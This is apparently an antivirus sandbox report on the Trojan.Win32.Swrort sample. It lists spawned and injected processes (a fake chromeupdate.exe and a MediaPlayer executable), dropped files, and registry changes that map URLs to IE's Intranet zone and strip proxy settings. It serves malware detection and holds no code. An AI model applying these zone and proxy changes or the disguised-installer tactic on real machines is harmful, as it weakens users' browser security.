Trojan.Win32.Swrort.3_eb4a1216ea

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820

The Trojan injects its code into the following process(es):

MediaPlayer__15159_il35679.exe:1884

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)

The process %original file name%.exe:228 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process irsetup.exe:188 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

The process irsetup.exe:1668 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe (12280 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (0 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)

The process chromeupdate.exe:1820 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

Registry activity

The process msconfig.exe:656 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 27 9F F6 F6 93 CA 7A D9 D9 71 4D D7 FB 8A 67"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\cousins.epoxied.1]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\cousins.epoxied.1\CLSID]
"(Default)" = "{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\VersionIndependentProgID]
"(Default)" = "cousins.epoxied"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\cousins.epoxied]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\TypeLib]
"(Default)" = "{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\cousins.epoxied\CurVer]
"(Default)" = "cousins.epoxied.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level" = ""

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1449692446"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A EE 8F 0A 84 D8 F6 46 51 DB B6 5D E1 92 43 BF"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"(Default)" = "{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MediaPlayer__15159_il35679.exe"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\ProgID]
"(Default)" = "cousins.epoxied.1"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}]
"(Default)" = "Inst Class"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process %original file name%.exe:228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 24 A9 41 8C B4 D6 53 9D DA A4 48 EF A1 7A CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process irsetup.exe:188 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 61 5A FB E4 3A A8 3F 65 D9 1D 76 7D 33 AD 77"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process irsetup.exe:1668 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"HelpLink" = "http://www.yourcompany.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayIcon" = "%Program Files%\Your Product\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

